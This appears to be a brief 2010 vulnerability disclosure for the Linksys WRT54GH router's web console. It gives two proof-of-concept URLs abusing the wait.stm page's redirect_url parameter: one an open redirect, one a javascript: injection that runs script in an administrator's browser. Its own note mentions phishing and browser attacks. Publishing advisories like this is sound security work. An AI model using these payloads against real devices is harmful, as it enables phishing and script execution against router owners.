Nishant Das Patnaik

# TITLE: Linksys WRT54GH Web Management Console URL Redirection & Code Execution

# DATE: 12/09/2010

# AUTHOR: Nishant Das Patnaik [Web: http://nishantdaspatnaik.yolasite.com]

# DOWNLOAD: N.A.

# F/W VERSION: 1.0.00 Build 005

# TESTED ON: Linksys WRT54GH with Firmware v 1.0.00 build 005

# CODE:

http://192.168.1.1/wait.stm?redirect_url=http://www.google.co.in&delay_time=0
http://192.168.1.1/wait.stm?redirect_url=javascript:document.location='http://www.google.co.in';&delay_time=0

# NOTE: This URL can be used by a malicious attacker to execute javascript or redirect to a malicious site for phishing attacks or some kind of browser attacks on the client.

# REFERENCE: http://www.linksysbycisco.com/APAC/en/support/WRT54GH